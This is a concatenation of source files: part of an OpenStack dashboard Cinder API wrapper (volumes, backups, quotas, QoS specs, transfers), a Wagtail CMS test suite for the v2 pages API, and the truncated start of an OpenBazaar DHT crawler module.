return cinder_config.get('enable_backup', False)
def volume_backup_get(request, backup_id):
backup = cinderclient(request).backups.get(backup_id)
return VolumeBackup(backup)
def volume_backup_list(request):
c_client = cinderclient(request)
if c_client is None:
return []
return [VolumeBackup(b) for b in c_client.backups.list()]
def volume_backup_create(request,
volume_id,
container_name,
name,
description):
backup = cinderclient(request).backups.create(
volume_id,
container=container_name,
name=name,
description=description)
return VolumeBackup(backup)
def volume_backup_delete(request, backup_id):
return cinderclient(request).backups.delete(backup_id)
def volume_backup_restore(request, backup_id, volume_id):
return cinderclient(request).restores.restore(backup_id=backup_id,
volume_id=volume_id)
def volume_manage(request,
host,
identifier,
id_type,
name,
description,
volume_type,
availability_zone,
metadata,
bootable):
source = {id_type: identifier}
return cinderclient(request).volumes.manage(
host=host,
ref=source,
name=name,
description=description,
volume_type=volume_type,
availability_zone=availability_zone,
metadata=metadata,
bootable=bootable)
def volume_unmanage(request, volume_id):
return cinderclient(request).volumes.unmanage(volume=volume_id)
def tenant_quota_get(request, tenant_id):
c_client = cinderclient(request)
if c_client is None:
return base.QuotaSet()
return base.QuotaSet(c_client.quotas.get(tenant_id))
def tenant_quota_update(request, tenant_id, **kwargs):
return cinderclient(request).quotas.update(tenant_id, **kwargs)
def default_quota_get(request, tenant_id):
return base.QuotaSet(cinderclient(request).quotas.defaults(tenant_id))
def volume_type_list_with_qos_associations(request):
vol_types = volume_type_list(request)
vol_types_dict = {}
# initialize and build a dictionary for lookup access below
for vol_type in vol_types:
vol_type.associated_qos_spec = ""
vol_types_dict[vol_type.id] = vol_type
# get all currently defined qos specs
qos_specs = qos_spec_list(request)
for qos_spec in qos_specs:
# get all volume types this qos spec is associated with
assoc_vol_types = qos_spec_get_associations(request, qos_spec.id)
for assoc_vol_type in assoc_vol_types:
# update volume type to hold this association info
vol_type = vol_types_dict[assoc_vol_type.id]
vol_type.associated_qos_spec = qos_spec.name
return vol_types
def default_quota_update(request, **kwargs):
cinderclient(request).quota_classes.update(DEFAULT_QUOTA_NAME, **kwargs)
def volume_type_list(request):
return cinderclient(request).volume_types.list()
def volume_type_create(request, name):
return cinderclient(request).volume_types.create(name)
def volume_type_delete(request, volume_type_id):
return cinderclient(request).volume_types.delete(volume_type_id)
def volume_type_get(request, volume_type_id):
return cinderclient(request).volume_types.get(volume_type_id)
def volume_encryption_type_create(request, volume_type_id, data):
return cinderclient(request).volume_encryption_types.create(volume_type_id,
specs=data)
def volume_encryption_type_delete(request, volume_type_id):
return cinderclient(request).volume_encryption_types.delete(volume_type_id)
def volume_encryption_type_get(request, volume_type_id):
return cinderclient(request).volume_encryption_types.get(volume_type_id)
def volume_encryption_type_list(request):
return cinderclient(request).volume_encryption_types.list()
def volume_type_extra_get(request, type_id, raw=False):
vol_type = volume_type_get(request, type_id)
extras = vol_type.get_keys()
if raw:
return extras
return [VolTypeExtraSpec(type_id, key, value) for
key, value in extras.items()]
def volume_type_extra_set(request, type_id, metadata):
vol_type = volume_type_get(request, type_id)
if not metadata:
return None
return vol_type.set_keys(metadata)
def volume_type_extra_delete(request, type_id, keys):
vol_type = volume_type_get(request, type_id)
return vol_type.unset_keys([keys])
def qos_spec_list(request):
return cinderclient(request).qos_specs.list()
def qos_spec_get(request, qos_spec_id):
return cinderclient(request).qos_specs.get(qos_spec_id)
def qos_spec_delete(request, qos_spec_id):
return cinderclient(request).qos_specs.delete(qos_spec_id, force=True)
def qos_spec_create(request, name, specs):
return cinderclient(request).qos_specs.create(name, specs)
def qos_spec_get_keys(request, qos_spec_id, raw=False):
spec = qos_spec_get(request, qos_spec_id)
qos_specs = spec.specs
if raw:
return spec
return [QosSpec(qos_spec_id, key, value) for
key, value in qos_specs.items()]
def qos_spec_set_keys(request, qos_spec_id, specs):
return cinderclient(request).qos_specs.set_keys(qos_spec_id, specs)
def qos_spec_unset_keys(request, qos_spec_id, specs):
return cinderclient(request).qos_specs.unset_keys(qos_spec_id, specs)
def qos_spec_associate(request, qos_specs, vol_type_id):
return cinderclient(request).qos_specs.associate(qos_specs, vol_type_id)
def qos_spec_disassociate(request, qos_specs, vol_type_id):
return cinderclient(request).qos_specs.disassociate(qos_specs, vol_type_id)
def qos_spec_get_associations(request, qos_spec_id):
return cinderclient(request).qos_specs.get_associations(qos_spec_id)
@memoized
def tenant_absolute_limits(request):
limits = cinderclient(request).limits.get().absolute
limits_dict = {}
for limit in limits:
if limit.value < 0:
# In some cases, the absolute limits data in Cinder can get
# out of sync causing the total.*Used limits to return
# negative values instead of 0. For such cases, replace
# negative values with 0.
if limit.name.startswith('total') and limit.name.endswith('Used'):
limits_dict[limit.name] = 0
else:
# -1 is used to represent unlimited quotas
limits_dict[limit.name] = float("inf")
else:
limits_dict[limit.name] = limit.value
return limits_dict
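# Example of the normalization applied above (limit names and values made up):
#
#   raw limits:  totalVolumesUsed = -1, maxTotalVolumes = -1, maxTotalVolumeGigabytes = 1000
#   result:      {'totalVolumesUsed': 0,
#                 'maxTotalVolumes': float('inf'),
#                 'maxTotalVolumeGigabytes': 1000}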
def service_list(request):
return cinderclient(request).services.list()
def availability_zone_list(request, detailed=False):
return cinderclient(request).availability_zones.list(detailed=detailed)
@memoized
def list_extensions(request):
return cinder_list_extensions.ListExtManager(cinderclient(request))\
.show_all()
@memoized
def extension_supported(request, extension_name):
"""This method will determine if Cinder supports a given extension name.
"""
extensions = list_extensions(request)
for extension in extensions:
if extension.name == extension_name:
return True
return False
def transfer_list(request, detailed=True, search_opts=None):
"""To see all volumes transfers as an admin pass in a special
search option: {'all_tenants': 1}
"""
c_client = cinderclient(request)
return [VolumeTransfer(v) for v in c_client.transfers.list(
detailed=detailed, search_opts=search_opts)]
def transfer_get(request, transfer_id):
transfer_data = cinderclient(request).transfers.get(transfer_id)
return VolumeTransfer(transfer_data)
def transfer_create(request, transfer_id, name):
volume = cinderclient(request).transfers.create(transfer_id, name)
return VolumeTransfer(volume)
def transfer_accept(request, transfer_id, auth_key):
return cinderclient(request).transfers.accept(transfer_id, auth_key)
def transfer_delete(request, transfer_id):
return cinderclient(request).transfers.delete(transfer_id)
|
|
import json
import mock
import collections
from django.test import TestCase
from django.test.utils import override_settings
from django.core.urlresolvers import reverse
from wagtail.wagtailcore.models import Page
from wagtail.api.v2 import signal_handlers
from wagtail.tests.demosite import models
from wagtail.tests.testapp.models import StreamPage
def get_total_page_count():
# Need to take away 1 as the root page is invisible over the API
return Page.objects.live().public().count() - 1
class TestPageListing(TestCase):
fixtures = ['demosite.json']
def get_response(self, **params):
return self.client.get(reverse('wagtailapi_v2:pages:listing'), params)
def get_page_id_list(self, content):
return [page['id'] for page in content['items']]
# BASIC TESTS
def test_basic(self):
response = self.get_response()
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-type'], 'application/json')
# Will crash if the JSON is invalid
content = json.loads(response.content.decode('UTF-8'))
# Check that the meta section is there
self.assertIn('meta', content)
self.assertIsInstance(content['meta'], dict)
# Check that the total count is there and correct
self.assertIn('total_count', content['meta'])
self.assertIsInstance(content['meta']['total_count'], int)
self.assertEqual(content['meta']['total_count'], get_total_page_count())
# Check that the items section is there
self.assertIn('items', content)
self.assertIsInstance(content['items'], list)
# Check that each page has a meta section with type, detail_url, html_url, slug and first_published_at attributes
for page in content['items']:
self.assertIn('meta', page)
self.assertIsInstance(page['meta'], dict)
self.assertEqual(set(page['meta'].keys()), {'type', 'detail_url', 'html_url', 'slug', 'first_published_at'})
def test_unpublished_pages_dont_appear_in_list(self):
total_count = get_total_page_count()
page = models.BlogEntryPage.objects.get(id=16)
page.unpublish()
response = self.get_response()
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(content['meta']['total_count'], total_count - 1)
def test_private_pages_dont_appear_in_list(self):
total_count = get_total_page_count()
page = models.BlogIndexPage.objects.get(id=5)
page.view_restrictions.create(password='test')
new_total_count = get_total_page_count()
self.assertNotEqual(total_count, new_total_count)
response = self.get_response()
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(content['meta']['total_count'], new_total_count)
# TYPE FILTER
def test_type_filter_items_are_all_blog_entries(self):
response = self.get_response(type='demosite.BlogEntryPage')
content = json.loads(response.content.decode('UTF-8'))
for page in content['items']:
self.assertEqual(page['meta']['type'], 'demosite.BlogEntryPage')
# No specific fields available by default
self.assertEqual(set(page.keys()), {'id', 'meta', 'title'})
def test_type_filter_total_count(self):
response = self.get_response(type='demosite.BlogEntryPage')
content = json.loads(response.content.decode('UTF-8'))
# Total count must be reduced as this filters the results
self.assertEqual(content['meta']['total_count'], 3)
def test_type_filter_multiple(self):
response = self.get_response(type='demosite.BlogEntryPage,demosite.EventPage')
content = json.loads(response.content.decode('UTF-8'))
blog_page_seen = False
event_page_seen = False
for page in content['items']:
self.assertIn(page['meta']['type'], ['demosite.BlogEntryPage', 'demosite.EventPage'])
if page['meta']['type'] == 'demosite.BlogEntryPage':
blog_page_seen = True
elif page['meta']['type'] == 'demosite.EventPage':
event_page_seen = True
# Only generic fields available
self.assertEqual(set(page.keys()), {'id', 'meta', 'title'})
self.assertTrue(blog_page_seen, "No blog pages were found in the items")
self.assertTrue(event_page_seen, "No event pages were found in the items")
def test_non_existant_type_gives_error(self):
response = self.get_response(type='demosite.IDontExist')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "type doesn't exist"})
def test_non_page_type_gives_error(self):
response = self.get_response(type='auth.User')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "type doesn't exist"})
# FIELDS
def test_fields_default(self):
response = self.get_response(type='demosite.BlogEntryPage')
content = json.loads(response.content.decode('UTF-8'))
for page in content['items']:
self.assertEqual(set(page.keys()), {'id', 'meta', 'title'})
self.assertEqual(set(page['meta'].keys()), {'type', 'detail_url', 'html_url', 'slug', 'first_published_at'})
def test_fields(self):
response = self.get_response(type='demosite.BlogEntryPage', fields='title,date,feed_image')
content = json.loads(response.content.decode('UTF-8'))
for page in content['items']:
self.assertEqual(set(page.keys()), {'id', 'meta', 'title', 'date', 'feed_image'})
def test_fields_child_relation(self):
response = self.get_response(type='demosite.BlogEntryPage', fields='title,related_links')
content = json.loads(response.content.decode('UTF-8'))
for page in content['items']:
self.assertEqual(set(page.keys()), {'id', 'meta', 'title', 'related_links'})
self.assertIsInstance(page['related_links'], list)
def test_fields_foreign_key(self):
response = self.get_response(type='demosite.BlogEntryPage', fields='title,date,feed_image')
content = json.loads(response.content.decode('UTF-8'))
for page in content['items']:
feed_image = page['feed_image']
if feed_image is not None:
self.assertIsInstance(feed_image, dict)
self.assertEqual(set(feed_image.keys()), {'id', 'meta'})
self.assertIsInstance(feed_image['id'], int)
self.assertIsInstance(feed_image['meta'], dict)
self.assertEqual(set(feed_image['meta'].keys()), {'type', 'detail_url'})
self.assertEqual(feed_image['meta']['type'], 'wagtailimages.Image')
self.assertEqual(feed_image['meta']['detail_url'], 'http://localhost/api/v2beta/images/%d/' % feed_image['id'])
def test_fields_tags(self):
response = self.get_response(type='demosite.BlogEntryPage', fields='tags')
content = json.loads(response.content.decode('UTF-8'))
for page in content['items']:
self.assertEqual(set(page.keys()), {'id', 'meta', 'tags'})
self.assertIsInstance(page['tags'], list)
def test_fields_ordering(self):
response = self.get_response(type='demosite.BlogEntryPage', fields='date,title,feed_image,related_links')
# Will crash if the JSON is invalid
content = json.loads(response.content.decode('UTF-8'))
# Test field order
content = json.JSONDecoder(object_pairs_hook=collections.OrderedDict).decode(response.content.decode('UTF-8'))
field_order = [
'id',
'meta',
'title',
'date',
'feed_image',
'related_links',
]
self.assertEqual(list(content['items'][0].keys()), field_order)
def test_fields_without_type_gives_error(self):
response = self.get_response(fields='title,related_links')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "unknown fields: related_links"})
def test_fields_which_are_not_in_api_fields_gives_error(self):
response = self.get_response(fields='path')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "unknown fields: path"})
def test_fields_unknown_field_gives_error(self):
response = self.get_response(fields='123,title,abc')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "unknown fields: 123, abc"})
# FILTERING
def test_filtering_exact_filter(self):
response = self.get_response(title='Home page')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [2])
def test_filtering_exact_filter_on_specific_field(self):
response = self.get_response(type='demosite.BlogEntryPage', date='2013-12-02')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [16])
def test_filtering_on_id(self):
response = self.get_response(id=16)
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [16])
def test_filtering_doesnt_work_on_specific_fields_without_type(self):
response = self.get_response(date='2013-12-02')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "query parameter is not an operation or a recognised field: date"})
def test_filtering_tags(self):
response = self.get_response(type='demosite.BlogEntryPage', tags='wagtail')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [16, 18])
def test_filtering_multiple_tags(self):
response = self.get_response(type='demosite.BlogEntryPage', tags='wagtail,bird')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [16])
def test_filtering_unknown_field_gives_error(self):
response = self.get_response(not_a_field='abc')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "query parameter is not an operation or a recognised field: not_a_field"})
# CHILD OF FILTER
def test_child_of_filter(self):
response = self.get_response(child_of=5)
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [16, 18, 19])
def test_child_of_root(self):
# "root" gets children of the homepage of the current site
response = self.get_response(child_of='root')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [4, 5, 6, 20, 12])
def test_child_of_with_type(self):
response = self.get_response(type='demosite.EventPage', child_of=5)
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [])
def test_child_of_unknown_page_gives_error(self):
response = self.get_response(child_of=1000)
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "parent page doesn't exist"})
def test_child_of_not_integer_gives_error(self):
response = self.get_response(child_of='abc')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "child_of must be a positive integer"})
def test_child_of_page_thats_not_in_same_site_gives_error(self):
# Root page is not in any site, so pretend it doesn't exist
response = self.get_response(child_of=1)
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "parent page doesn't exist"})
# DESCENDANT OF FILTER
def test_descendant_of_filter(self):
response = self.get_response(descendant_of=6)
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [10, 15, 17, 21, 22, 23])
def test_descendant_of_root(self):
# "root" gets decendants of the homepage of the current site
# Basically returns every page except the homepage
response = self.get_response(descendant_of='root')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [4, 8, 9, 5, 16, 18, 19, 6, 10, 15, 17, 21, 22, 23, 20, 13, 14, 12])
def test_descendant_of_with_type(self):
response = self.get_response(type='tests.EventPage', descendant_of=6)
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [])
def test_descendant_of_unknown_page_gives_error(self):
response = self.get_response(descendant_of=1000)
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "ancestor page doesn't exist"})
def test_descendant_of_not_integer_gives_error(self):
response = self.get_response(descendant_of='abc')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "descendant_of must be a positive integer"})
def test_descendant_of_page_thats_not_in_same_site_gives_error(self):
# Root page is not in any site, so pretend it doesn't exist
response = self.get_response(descendant_of=1)
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "ancestor page doesn't exist"})
def test_descendant_of_when_filtering_by_child_of_gives_error(self):
response = self.get_response(descendant_of=6, child_of=5)
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "filtering by descendant_of with child_of is not supported"})
# ORDERING
def test_ordering_default(self):
response = self.get_response()
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [2, 4, 8, 9, 5, 16, 18, 19, 6, 10, 15, 17, 21, 22, 23, 20, 13, 14, 12])
def test_ordering_by_title(self):
response = self.get_response(order='title')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [21, 22, 19, 23, 5, 16, 18, 12, 14, 8, 9, 4, 2, 13, 20, 17, 6, 10, 15])
def test_ordering_by_title_backwards(self):
response = self.get_response(order='-title')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [15, 10, 6, 17, 20, 13, 2, 4, 9, 8, 14, 12, 18, 16, 5, 23, 19, 22, 21])
def test_ordering_by_random(self):
response_1 = self.get_response(order='random')
content_1 = json.loads(response_1.content.decode('UTF-8'))
page_id_list_1 = self.get_page_id_list(content_1)
response_2 = self.get_response(order='random')
content_2 = json.loads(response_2.content.decode('UTF-8'))
page_id_list_2 = self.get_page_id_list(content_2)
self.assertNotEqual(page_id_list_1, page_id_list_2)
def test_ordering_by_random_backwards_gives_error(self):
response = self.get_response(order='-random')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "cannot order by 'random' (unknown field)"})
def test_ordering_by_random_with_offset_gives_error(self):
response = self.get_response(order='random', offset=10)
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "random ordering with offset is not supported"})
def test_ordering_default_with_type(self):
response = self.get_response(type='demosite.BlogEntryPage')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [16, 18, 19])
def test_ordering_by_title_with_type(self):
response = self.get_response(type='demosite.BlogEntryPage', order='title')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [19, 16, 18])
def test_ordering_by_specific_field_with_type(self):
response = self.get_response(type='demosite.BlogEntryPage', order='date')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list, [16, 18, 19])
def test_ordering_by_unknown_field_gives_error(self):
response = self.get_response(order='not_a_field')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "cannot order by 'not_a_field' (unknown field)"})
# LIMIT
def test_limit_only_two_items_returned(self):
response = self.get_response(limit=2)
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(len(content['items']), 2)
def test_limit_total_count(self):
response = self.get_response(limit=2)
content = json.loads(response.content.decode('UTF-8'))
# The total count must not be affected by "limit"
self.assertEqual(content['meta']['total_count'], get_total_page_count())
def test_limit_not_integer_gives_error(self):
response = self.get_response(limit='abc')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "limit must be a positive integer"})
def test_limit_too_high_gives_error(self):
response = self.get_response(limit=1000)
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "limit cannot be higher than 20"})
@override_settings(WAGTAILAPI_LIMIT_MAX=10)
def test_limit_maximum_can_be_changed(self):
response = self.get_response(limit=20)
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "limit cannot be higher than 10"})
@override_settings(WAGTAILAPI_LIMIT_MAX=2)
def test_limit_default_changes_with_max(self):
# The default limit is 20. If WAGTAILAPI_LIMIT_MAX is less than that,
# the default should change accordingly.
response = self.get_response()
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(len(content['items']), 2)
# OFFSET
def test_offset_5_usually_appears_5th_in_list(self):
response = self.get_response()
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list.index(5), 4)
def test_offset_5_moves_after_offset(self):
response = self.get_response(offset=4)
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(page_id_list.index(5), 0)
def test_offset_total_count(self):
response = self.get_response(offset=10)
content = json.loads(response.content.decode('UTF-8'))
# The total count must not be affected by "offset"
self.assertEqual(content['meta']['total_count'], get_total_page_count())
def test_offset_not_integer_gives_error(self):
response = self.get_response(offset='abc')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "offset must be a positive integer"})
# SEARCH
def test_search_for_blog(self):
response = self.get_response(search='blog')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
# Check that the items are the blog index and three blog pages
self.assertEqual(set(page_id_list), set([5, 16, 18, 19]))
def test_search_with_type(self):
response = self.get_response(type='demosite.BlogEntryPage', search='blog')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(set(page_id_list), set([16, 18, 19]))
def test_search_when_ordering_gives_error(self):
response = self.get_response(search='blog', order='title')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "ordering with a search query is not supported"})
@override_settings(WAGTAILAPI_SEARCH_ENABLED=False)
def test_search_when_disabled_gives_error(self):
response = self.get_response(search='blog')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "search is disabled"})
def test_search_when_filtering_by_tag_gives_error(self):
response = self.get_response(type='demosite.BlogEntryPage', search='blog', tags='wagtail')
content = json.loads(response.content.decode('UTF-8'))
self.assertEqual(response.status_code, 400)
self.assertEqual(content, {'message': "filtering by tag with a search query is not supported"})
def test_search_operator_and(self):
response = self.get_response(type='demosite.BlogEntryPage', search='blog again', search_operator='and')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(set(page_id_list), set([18]))
def test_search_operator_or(self):
response = self.get_response(type='demosite.BlogEntryPage', search='blog again', search_operator='or')
content = json.loads(response.content.decode('UTF-8'))
page_id_list = self.get_page_id_list(content)
self.assertEqual(set(page_id_list), set([16, 18, 19]))
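# The keyword arguments handed to get_response() in the listing tests above map
# one-to-one onto query-string parameters of the pages listing endpoint, e.g.
# (illustrative URLs, not part of the test suite):
#   /api/v2beta/pages/?search=blog+again&search_operator=and&type=demosite.BlogEntryPage
#   /api/v2beta/pages/?child_of=5&type=demosite.EventPage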
class TestPageDetail(TestCase):
fixtures = ['demosite.json']
def get_response(self, page_id, **params):
return self.client.get(reverse('wagtailapi_v2:pages:detail', args=(page_id, )), params)
def test_basic(self):
response = self.get_response(16)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['Content-type'], 'application/json')
# Will crash if the JSON is invalid
content = json.loads(response.content.decode('UTF-8'))
# Check the id field
self.assertIn('id', content)
self.assertEqual(content['id'], 16)
# Check that the meta section is there
self.assertIn('meta', content)
self.assertIsInstance(content['meta'], dict)
# Check the meta type
self.assertIn('type', content['meta'])
self.assertEqual(content['meta']['type'], 'demosite.BlogEntryPage')
# Check the meta detail_url
self.assertIn('detail_url', content['meta'])
self.assertEqual(content['meta']['detail_url'], 'http://localhost/api/v2beta/pages/16/')
# Check the meta html_url
self.assertIn('html_url', content['meta'])
self.assertEqual(content['meta']['html_url'], 'http://localhost/blog-index/blog-post/')
# Check the parent field
self.assertIn('parent', content['meta'])
self.assertIsInstance(content['meta']['parent'], dict)
self.assertEqual(set(content['meta']['parent'].keys()), {'id', 'meta'})
self.assertEqual(content['meta']['parent']['id'], 5)
self.assertIsInstance(content['meta']['parent']['meta'], dict)
self.assertEqual(set(content['meta']['parent']['meta'].keys()), {'type', 'detail_url', 'html_url'})
self.assertEqual(content['meta']['parent']['meta']['type'], 'demosite.BlogIndexPage')
self.assertEqual(content['meta']['parent']['meta']['detail_url'], 'http://localhost/api/v2beta/pages/5/')
self.assertEqual(content['meta']['parent']['meta']['html_url'], 'http://localhost/blog-index/')
# Check that the custom fields are included
self.assertIn('date', content)
self.assertIn('body', content)
self.assertIn('tags', content)
self.assertIn('feed_image', content)
self.assertIn('related_links', content)
self.assertIn('carousel_items', content)
# Check that the date was serialised properly
self.assertEqual(content['date'], '2013-12-02')
# Check that the tags were serialised properly
self.assertEqual(content['tags'], ['bird', 'wagtail'])
# Check that the feed image was serialised properly
self.assertIsInstance(content['feed_image'], dict)
self.assertEqual(set(content['feed_image'].keys()), {'id', 'meta'})
self.assertEqual(content['feed_image']['id'], 7)
self.assertIsInstance(content['feed_image']['meta'], dict)
self.assertEqual(set(content['feed_image']['meta'].keys()), {'type', 'detail_url'})
self.assertEqual(content['feed_image']['meta']['type'], 'wagtailimages.Image')
self.assertEqual(content['feed_image']['meta']['detail_url'], 'http://localhost/api/v2beta/images/7/')
# Check that the child relations were serialised properly
self.assertEqual(content['related_links'], [])
for carousel_item in content['carousel_items']:
self.assertEqual(set(carousel_item.keys()), {'id', 'meta', 'embed_url', 'link', 'caption', 'image'})
self.assertEqual(set(carousel_item['meta'].keys()), {'type'})
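# Abridged shape of the detail response described by the assertions above
# (reconstructed from the checks; nested values shortened for illustration):
#   {
#     "id": 16,
#     "meta": {"type": "demosite.BlogEntryPage",
#              "detail_url": "http://localhost/api/v2beta/pages/16/",
#              "html_url": "http://localhost/blog-index/blog-post/",
#              "parent": {"id": 5, "meta": {...}}},
#     "date": "2013-12-02",
#     "tags": ["bird", "wagtail"],
#     "feed_image": {"id": 7, "meta": {...}},
#     "related_links": [],
#     "carousel_items": [...]
#   }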
def test_meta_parent_id_doesnt_show_root_page(self):
# Root page isn't in the site so don't show it if the user is looking at the home page
response = self.get_response(2)
content = json.loads(response.content.decode('UTF-8'))
self.assertIsNone(content['meta']['parent'])
def test_field_ordering(self):
response = self.get_response(16)
# Will crash if the JSON is invalid
content = json.loads(response.content.decode('UTF-8'))
# Test field order
content = json.JSONDecoder(object_pairs_hook=collections.OrderedDict).decode(response.content.decode('UTF-8'))
field_order = [
'id',
'meta',
'title',
'body',
'tags',
'date',
'feed_image',
'carousel_items',
'related_links',
]
self.assertEqual(list(content.keys()), field_order)
def test_null_foreign_key(self):
models.BlogEntryPage.objects.filter(id=16).update(feed_image_id=None)
response = self.get_response(16)
content = json.loads(response.content.decode('UTF-8'))
self.assertIn('related_links', content)
self.assertEqual(content['feed_image'], None)
class TestPageDetailWithStreamField(TestCase):
fixtures = ['test.json']
def setUp(self):
self.homepage = Page.objects.get(url_path='/home/')
def make_stream_page(self, body):
stream_page = StreamPage(
title='stream page',
slug='stream-page',
body=body
)
return self.homepage.add_child(instance=stream_page)
def test_can_fetch_streamfield_content(self):
stream_page = self.make_stream_page('[{"type": "text", "value": "foo"}]')
response_url = reverse('wagtailapi_v2:pages:detail', args=(stream_page.id, ))
response = self.client.get(response_url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response['content-type'], 'application/json')
content = json.loads(response.content.decode('utf-8'))
self.assertIn('id', content)
self.assertEqual(content['id'], stream_page.id)
self.assertIn('body', content)
self.assertEqual(content['body'], [{'type': 'text', 'value': 'foo'}])
def test_image_block(self):
stream_page = self.make_stream_page('[{"type": "image", "value": 1}]')
response_url = reverse('wagtailapi_v2:pages:detail', args=(stream_page.id, ))
response = self.client.get(response_url)
content = json.loads(response.content.decode('utf-8'))
# ForeignKeys in a StreamField shouldn't be translated into dictionary representation
self.assertEqual(content['body'], [{'type': 'image', 'value': 1}])
@override_settings(
WAGTAILFRONTENDCACHE={
'varnish': {
'BACKEND': 'wagtail.contrib.wagtailfrontendcache.backends.HTTPBackend',
'LOCATION': 'http://localhost:8000',
},
},
WAGTAILAPI_BASE_URL='http://api.example.com',
)
@mock.patch('wagtail.contrib.wagtailfrontendcache.backends.HTTPBackend.purge')
class TestPageCacheInvalidation(TestCase):
fixtures = ['demosite.json']
@classmethod
def setUpClass(cls):
super(TestPageCacheInvalidation, cls).setUpClass()
signal_handlers.register_signal_handlers()
@classmethod
def tearDownClass(cls):
super(TestPageCacheInvalidation, cls).tearDownClass()
signal_handlers.unregister_signal_handlers()
def test_republish_page_purges(self, purge):
Page.objects.get(id=2).save_revision().publish()
purge.assert_any_call('http://api.example.com/api/v2beta/pages/2/')
def test_unpublish_page_purges(self, purge):
Page.objects.get(id=2).unpublish()
purge.assert_any_call('http://api.example.com/api/v2beta/pages/2/')
def test_delete_page_purges(self, purge):
Page.objects.get(id=16).delete()
purge.assert_any_call('http://api.example.com/api/v2beta/pages/16/')
def test_save_draft_doesnt_purge(self, purge):
Page.objects.get(id=2).save_revision()
purge.assert_not_called()
|
|
"""
Copyright (c) 2014 Brian Muller
Copyright (c) 2015 OpenBazaar
"""
from collections import Counter, defaultdict
from twisted.internet import defer
from log import Logger
from dht.utils import deferredDict
from dht.node import Node, NodeHeap
from protos import objects
class SpiderCrawl(object):
"""
